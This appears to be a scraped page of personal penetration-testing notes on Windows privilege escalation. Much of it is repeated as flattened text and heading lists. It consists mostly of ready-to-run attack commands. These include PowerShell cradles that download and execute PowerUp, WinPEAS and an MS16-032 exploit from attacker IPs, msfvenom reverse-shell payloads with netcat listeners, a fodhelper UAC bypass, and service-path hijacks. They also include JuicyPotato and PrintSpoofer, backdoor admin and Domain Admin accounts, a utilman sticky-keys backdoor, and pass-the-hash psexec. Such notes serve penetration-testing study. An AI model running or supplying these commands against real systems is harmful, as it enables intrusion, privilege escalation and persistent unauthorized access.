Windows

powerup


powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.129/PowerUp.ps1'); Invoke-AllChecks"

IWR -Uri http://192.168.45.5/PowerUp.ps1 -OutFile C:\tmp\PowerUp.ps1
. .\PowerUp.ps1 ; Invoke-AllChecks

Get-Command -Module powerup

winpeas / windows-exploit-suggester.py

winpeasany.exe
winpeas.bat
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/WinPeas.bat')"

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
(cmd.exe /c "systeminfo")

Windows

AlwaysInstallElevated install .msi shell

#see 0x1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

cmd.exe /c 'systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"'
(check system type x86 or x64)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.1.30 LPORT=443 -a x64 --platform Windows -f msi -o shell.msi

`fodhelper.exe` privesc

Administrators group account whoami /groups Medium -> High Mandatory level

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "shell/ps.exe" /f
REG QUERY HKCU\Software\Classes\ms-settings\Shell\Open\command /s
fodhelper.exe /s

ComputerDefaults.exe /s
changepk.exe /s

Weak service permission

A low privileged user is allowed to change service configuration - for example change the service binary the service launches when it starts
A low privileged user can overwrite the binary the service launches when it starts

SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG

Short life shell, need persist it by setting 2 listeners and run 2nd shell in & b4 1st shell die

#enum for a target svc

.\accesschk.exe -uws "Everyone" "C:\Program Files"
or
powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
or
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
or
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
.\accesschk.exe /accepteula -ucv "user" targetsvc

SERVICE_CHANGE_CONFIG:
#change exec path
sc.exe config targetsvc binpath= "c:\shell.exe"

SERVICE_ALL_ACCESS:
# check current binpath
sc.exe qc target

# check M access on the original service.exe from binpath
icacls C:\service.exe

cp C:\shell.exe C:\service.exe
sc start targetsvc

receive SYSTEM shell
listen & run shell.exe again to persist the short life shell
(need 2 listeners, make it to 2nd listener in 1st listener b4 it dies)

Unquoted service path

To list nonstandard services that start automatically

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"

find returned service having path without " " and find if precedential dir writable

icalcls "C:\puppet"

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.221 LPORT=4443 -f exe -o shell.exe

nc -nlvp 4443
python -m http.server 8080

$wc = New-Object System.Net.WebClient
$wc.DownloadFile("http://192.168.119.221:8080/shell.exe", "C:\program files\My.exe")

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

JuicyPotato ( `SeImpersonate` / `SeAssignPrimaryToken` )

whoami /priv

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.129 LPORT=4433 -f exe > shell.exe

nc -nlvp 4433

PS C:\inetpub\wwwroot> c:\inetpub\wwwroot\JuicyPotato.exe -l 2145 -p c:\inetpub\wwwroot\shell.exe -t *

C:\Users\Public\JuicyPotato.exe -t t -p C:\Users\Public\whoami.exe -l 5837
-p specifies the program we are trying to run
-l specify COM server listening arbitrary port
-t process creation mode (t if have selmpersonate priv)

May need to find an CLSID for the Windows version

https://github.com/ohpe/juicy-potato/tree/master/CLSID

JuicyPotato.exe -l 12345 -p C:\Users\Rob\Desktop\rev.exe-t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

RouguePotato/PrintSpoofer `SeImpersonate`

 Windows 10 and Server 2016/2019.
 
 .\PrintSpoofer64.exe -c .\shell.exe

ms16-032 (w/o KB3139914)

wmic qfe list | find "3139914"


https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1

. .\Invoke-MS16-032.ps1
Invoke-MS16-032.ps1

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://192.168.45.5/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

Create user for persistency as admin/system

net user kali pass1234! /add
net localgroup administrators kali /add
net localgroup "remote desktop users" kali /add

net group "Domain Admins" kali /add

impacket-psexec kali@ip

can add /domain flag behind if is creating with domain admin / DC ser admin
# can try with local admin?
net user kali2 kali1234 /add /Domain
net group "Domain Admins" hacker2 /add /domain

RDP login page "ease of access" system cmd

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

WindowsXP SP0/1 upnphost SSDPSRV

Need: file transfer to victim, low rev shell

sc qc upnphost
sc qc SSDPSRV
sc query SSDPSRV

sc config SSDPSRV start= auto
sc config upnphost binpath= "C:\Inetpub\wwwroot\rev2.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
net start SSDPSRV
net start upnphost

receive SYSTEM shell
listen & run C:\Inetpub\wwwroot\rev2.exe again to persist the short life shell
(need 2 listeners, make it to 2nd listener in 1st listener b4 it dies)

PSexec

PSexec.exe -s cmd.exe -accepteula (or rev.exe on local)
PSexec.exe \\DC01 (-s) cmd.exe -accepteula

-c C:\rev.exe copy the exe to remote and exec
(no -c = exec system path exe)
-d dun want for process to terminate (non-interactive, can use when rev.exe but not cmd)
-s run as system

impacket-psexec jose@192.168.168.88 -hashes :645dc5a8871d2a4269d4cbe23f6ae103   
or user:'pw'@ip

need 445 or use -port to specify; need admin user to access $Admin

If need use PS, need a rev.exe and powershell -ep bypassin new shell

PreviousLinux NextUAC eventvwr

Last updated 1 year ago

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.129/PowerUp.ps1'); Invoke-AllChecks" IWR -Uri http://192.168.45.5/PowerUp.ps1 -OutFile C:\tmp\PowerUp.ps1 . .\PowerUp.ps1 ; Invoke-AllChecks Get-Command -Module powerup

winpeasany.exe winpeas.bat powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/WinPeas.bat')" ./windows-exploit-suggester.py --update ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt (cmd.exe /c "systeminfo")

#see 0x1 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated cmd.exe /c 'systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"' (check system type x86 or x64) msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.1.30 LPORT=443 -a x64 --platform Windows -f msi -o shell.msi

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "shell/ps.exe" /f REG QUERY HKCU\Software\Classes\ms-settings\Shell\Open\command /s fodhelper.exe /s ComputerDefaults.exe /s changepk.exe /s

#enum for a target svc .\accesschk.exe -uws "Everyone" "C:\Program Files" or powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} or .\accesschk.exe /accepteula -uwcqv "Authenticated Users" * or Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} .\accesschk.exe /accepteula -ucv "user" targetsvc

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.221 LPORT=4443 -f exe -o shell.exe nc -nlvp 4443 python -m http.server 8080 $wc = New-Object System.Net.WebClient $wc.DownloadFile("http://192.168.119.221:8080/shell.exe", "C:\program files\My.exe")

whoami /priv msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.129 LPORT=4433 -f exe > shell.exe nc -nlvp 4433 PS C:\inetpub\wwwroot> c:\inetpub\wwwroot\JuicyPotato.exe -l 2145 -p c:\inetpub\wwwroot\shell.exe -t * C:\Users\Public\JuicyPotato.exe -t t -p C:\Users\Public\whoami.exe -l 5837 -p specifies the program we are trying to run -l specify COM server listening arbitrary port -t process creation mode (t if have selmpersonate priv)

https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 . .\Invoke-MS16-032.ps1 Invoke-MS16-032.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://192.168.45.5/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

net user kali pass1234! /add net localgroup administrators kali /add net localgroup "remote desktop users" kali /add net group "Domain Admins" kali /add impacket-psexec kali@ip can add /domain flag behind if is creating with domain admin / DC ser admin # can try with local admin? net user kali2 kali1234 /add /Domain net group "Domain Admins" hacker2 /add /domain

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

sc qc upnphost sc qc SSDPSRV sc query SSDPSRV sc config SSDPSRV start= auto sc config upnphost binpath= "C:\Inetpub\wwwroot\rev2.exe" sc config upnphost obj= ".\LocalSystem" password= "" net start SSDPSRV net start upnphost receive SYSTEM shell listen & run C:\Inetpub\wwwroot\rev2.exe again to persist the short life shell (need 2 listeners, make it to 2nd listener in 1st listener b4 it dies)

PSexec.exe -s cmd.exe -accepteula (or rev.exe on local) PSexec.exe \\DC01 (-s) cmd.exe -accepteula -c C:\rev.exe copy the exe to remote and exec (no -c = exec system path exe) -d dun want for process to terminate (non-interactive, can use when rev.exe but not cmd) -s run as system impacket-psexec jose@192.168.168.88 -hashes :645dc5a8871d2a4269d4cbe23f6ae103 or user:'pw'@ip need 445 or use -port to specify; need admin user to access $Admin

powerup

winpeas / windows-exploit-suggester.py

Windows

AlwaysInstallElevated install .msi shell

fodhelper.exe privesc

Weak service permission

Unquoted service path

JuicyPotato ( SeImpersonate / SeAssignPrimaryToken )

RouguePotato/PrintSpoofer SeImpersonate

ms16-032 (w/o KB3139914)

Create user for persistency as admin/system

WindowsXP SP0/1 upnphost SSDPSRV

PSexec

powerup

winpeas / windows-exploit-suggester.py

Windows

AlwaysInstallElevated install .msi shell

fodhelper.exe privesc

Weak service permission

Unquoted service path

JuicyPotato ( SeImpersonate / SeAssignPrimaryToken )

RouguePotato/PrintSpoofer SeImpersonate

ms16-032 (w/o KB3139914)

Create user for persistency as admin/system

WindowsXP SP0/1 upnphost SSDPSRV

PSexec

`fodhelper.exe` privesc

JuicyPotato ( `SeImpersonate` / `SeAssignPrimaryToken` )

RouguePotato/PrintSpoofer `SeImpersonate`

`fodhelper.exe` privesc

JuicyPotato ( `SeImpersonate` / `SeAssignPrimaryToken` )

RouguePotato/PrintSpoofer `SeImpersonate`